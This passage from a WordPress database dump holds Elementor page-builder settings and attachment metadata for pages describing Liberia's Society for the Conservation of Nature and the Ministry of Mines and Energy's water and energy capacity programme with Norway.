Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18904,2769,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Society for the Conservation of Nature of Liberia (SCNL) is Liberia\\u2019s oldest conservation organization. We are a not-for-profit and non-governmental organization. We promote the conservation and wise use of Liberia\\u2019s natural resources to ensure a healthy environment and good quality life for all people in Liberia.<\\/p><p>SCNL works to educate, encourage and assist the public to understand the need to conserve nature, build consensus on the effective management of biodiversity, and to ensure that the use of natural resources is sustainable.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:scnl\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18909,2769,'_thumbnail_id','2770'),(18910,2769,'_dp_original','1608'),(18911,2769,'_edit_lock','1629238183:42'),(18912,2769,'_edit_last','42'),(18913,2770,'_wp_attached_file','2019/11/featured_scnl.jpg'),(18914,2770,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1024;s:6:\"height\";i:530;s:4:\"file\";s:25:\"2019/11/featured_scnl.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:25:\"featured_scnl-300x155.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:155;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:25:\"featured_scnl-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:25:\"featured_scnl-768x398.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:398;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),(18915,2771,'_elementor_edit_mode','builder'),(18916,2771,'_elementor_template_type','wp-post'),(18917,2771,'_elementor_version','2.7.5'),(18918,2771,'_wp_page_template','default'),(18919,2771,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"mme\\\",\\\"tag_id\\\":\\\"60\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"mme\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"post_title_color\":\"#000000\",\"post_title_typography_typography\":\"custom\",\"post_title_typography_font_weight\":\"600\",\"post_text_color\":\"#7a7a7a\",\"post_text_typography_typography\":\"custom\",\"post_text_typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"post_button_bg_color\":\"#006400\",\"post_button_hover_bg_color\":\"#014421\",\"arrows_style_popover_toggle\":\"custom\"},\"elements\":[],\"widgetType\":\"jet-blog-smart-listing\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"53f2292\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"7b05689\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_fx_direction\":\"fade-in\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"]}]},\"elements\":[{\"id\":\"1eff497\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"5f481ee\",\"elType\":\"widget\",\"settings\":{\"text\":\"Divider\",\"color\":\"rgba(122,122,122,0.48)\",\"gap\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"divider\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9dc8e89\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"a075c63\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"bdfbd70\",\"elType\":\"widget\",\"settings\":{\"title\":\"Related Documents\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"2255307\",\"elType\":\"widget\",\"settings\":{\"shortcode\":\"[posts_table post_type=\\\"document\\\" \\ncolumns=\\\"id,title,\\nexcerpt,cf:download_link,\\ntax:resource_category:Categories,\\n\\\" width=\\\"auto,250px,400px,auto,auto,auto\\\" term=\\\"resource_tag:mme\\\" page_length=\\\"false\\\"]\"},\"elements\":[],\"widgetType\":\"shortcode\"}],\"isInner\":false}],\"isInner\":false}]'),(18920,2771,'_elementor_controls_usage','a:7:{s:11:\"text-editor\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:2;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:14:\"section_editor\";a:1:{s:6:\"editor\";i:1;}}s:5:\"style\";a:1:{s:13:\"section_style\";a:3:{s:10:\"text_color\";i:1;s:21:\"typography_typography\";i:1;s:20:\"typography_font_size\";i:1;}}}}s:6:\"column\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:0:{}}s:7:\"section\";a:3:{s:5:\"count\";i:4;s:15:\"control_percent\";i:0;s:8:\"controls\";a:1:{s:6:\"layout\";a:1:{s:16:\"section_parallax\";a:1:{s:24:\"jet_parallax_layout_list\";i:4;}}}}s:7:\"heading\";a:3:{s:5:\"count\";i:2;s:15:\"control_percent\";i:3;s:8:\"controls\";a:2:{s:7:\"content\";a:1:{s:13:\"section_title\";a:1:{s:5:\"title\";i:2;}}s:5:\"style\";a:1:{s:19:\"section_title_style\";a:5:{s:11:\"title_color\";i:2;s:21:\"typography_typography\";i:2;s:22:\"typography_font_family\";i:2;s:20:\"typography_font_size\";i:2;s:22:\"typography_font_weight\";i:2;}}}}s:22:\"jet-blog-smart-listing\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:2:{s:7:\"content\";a:3:{s:15:\"section_general\";a:8:{s:13:\"featured_post\";i:1;s:13:\"posts_columns\";i:1;s:10:\"image_size\";i:1;s:14:\"image_position\";i:1;s:14:\"excerpt_length\";i:1;s:9:\"read_more\";i:1;s:9:\"show_meta\";i:1;s:14:\"show_terms_tax\";i:1;}s:13:\"section_query\";a:3:{s:16:\"use_custom_query\";i:1;s:12:\"custom_query\";i:1;s:9:\"post_type\";i:1;}s:21:\"section_custom_fields\";a:2:{s:18:\"title_related_meta\";i:1;s:20:\"content_related_meta\";i:1;}}s:5:\"style\";a:3:{s:18:\"section_post_style\";a:6:{s:16:\"post_title_color\";i:1;s:32:\"post_title_typography_typography\";i:1;s:33:\"post_title_typography_font_weight\";i:1;s:15:\"post_text_color\";i:1;s:31:\"post_text_typography_typography\";i:1;s:30:\"post_text_typography_font_size\";i:1;}s:25:\"section_post_button_style\";a:2:{s:20:\"post_button_bg_color\";i:1;s:26:\"post_button_hover_bg_color\";i:1;}s:25:\"section_pagination_arrows\";a:1:{s:27:\"arrows_style_popover_toggle\";i:1;}}}}s:7:\"divider\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:5:\"style\";a:1:{s:21:\"section_divider_style\";a:2:{s:5:\"color\";i:1;s:3:\"gap\";i:1;}}}}s:9:\"shortcode\";a:3:{s:5:\"count\";i:1;s:15:\"control_percent\";i:1;s:8:\"controls\";a:1:{s:7:\"content\";a:1:{s:17:\"section_shortcode\";a:1:{s:9:\"shortcode\";i:1;}}}}}'),(18922,2771,'_thumbnail_id','2770'),(18923,2769,'_jetpack_related_posts_cache','a:1:{s:32:\"387e53bc056fb081449b6ed79a90f200\";a:2:{s:7:\"expires\";i:1628957967;s:7:\"payload\";a:3:{i:0;a:1:{s:2:\"id\";i:2965;}i:1;a:1:{s:2:\"id\";i:1614;}i:2;a:1:{s:2:\"id\";i:1612;}}}}'),(18924,2772,'_elementor_edit_mode','builder'),(18925,2772,'_elementor_template_type','wp-post'),(18926,2772,'_elementor_version','2.7.5'),(18927,2772,'_wp_page_template','default'),(18928,2772,'_elementor_data','[{\"id\":\"7bf16f53\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"df1efc1\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"76cad43e\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"47e134c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>The Ministry functions in the area of policy formulation for the energy, hydrocarbon and water sectors of the Liberia. MME has direct oversight responsibility in the energy sector, and also similar role in developing the water resources of the country.<\\/p><p>The Institutional Capacity Building and Strengthening of the Water Resources and Energy sectors of Liberia is a contract that is signed and in effect between the Norwegian Water Resources and Energy Directorate (NVE), and the Liberian Ministry of Mines and Energy (MME) to implement an Agreement (Program) between the Governments of Liberia and Norway. This Program is a 5-year (2010 \\u2013 2015) program that was signed in 2010.<\\/p>\",\"text_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"b0006e2\",\"elType\":\"section\",\"settings\":{\"jet_parallax_layout_list\":[{\"jet_parallax_layout_image\":{\"url\":\"\"},\"_id\":\"b4fdbac\",\"jet_parallax_layout_image_tablet\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_image_mobile\":{\"url\":\"\",\"id\":\"\"},\"jet_parallax_layout_speed\":{\"unit\":\"%\",\"size\":50,\"sizes\":[]},\"jet_parallax_layout_type\":\"scroll\",\"jet_parallax_layout_direction\":\"1\",\"jet_parallax_layout_z_index\":\"\",\"jet_parallax_layout_bg_x\":50,\"jet_parallax_layout_bg_y\":50,\"jet_parallax_layout_bg_size\":\"auto\",\"jet_parallax_layout_animation_prop\":\"transform\",\"jet_parallax_layout_on\":[\"desktop\",\"tablet\"],\"jet_parallax_layout_fx_direction\":\"fade-in\"}]},\"elements\":[{\"id\":\"e3150d9\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"e9d44d7\",\"elType\":\"widget\",\"settings\":{\"title\":\"Featured Projects\",\"title_color\":\"#000000\",\"typography_typography\":\"custom\",\"typography_font_family\":\"Arial\",\"typography_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"typography_font_weight\":\"100\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"14b21ae\",\"elType\":\"widget\",\"settings\":{\"featured_post\":\"\",\"featured_excerpt_trimmed_ending\":\"...\",\"featured_read_more_text\":\"Read More\",\"posts_columns\":\"3\",\"image_size\":\"full\",\"image_position\":\"top\",\"excerpt_length\":20,\"excerpt_trimmed_ending\":\"...\",\"read_more\":\"yes\",\"read_more_text\":\"Read More\",\"show_meta\":\"\",\"show_terms_tax\":\"resource_tag\",\"use_custom_query\":\"true\",\"custom_query\":\"{\\\"post_type\\\":\\\"project_resource\\\",\\\"order\\\":\\\"ASC\\\",\\\"orderby\\\":\\\"date\\\",\\\"posts_per_page\\\":\\\"3\\\",\\\"tag\\\":\\\"scnl\\\",\\\"tag_id\\\":\\\"210\\\",\\\"tax_query\\\":{\\\"0\\\":{\\\"taxonomy\\\":\\\"resource_tag\\\",\\\"field\\\":\\\"slug\\\",\\\"terms\\\":[\\\"scnl\\\"],\\\"operator\\\":\\\"IN\\\"},\\\"relation\\\":\\\"OR\\\"}}\",\"post_type\":\"project_resource\",\"all_btn_label\":\"All\",\"title_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c0fd7af\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, Y\"}],\"content_related_meta\":[{\"meta_label\":\"Label\",\"_id\":\"c9198db\",\"meta_key\":\"\",\"meta_format\":\"%s\",\"meta_callback\":\"\",\"date_format\":\"F j, 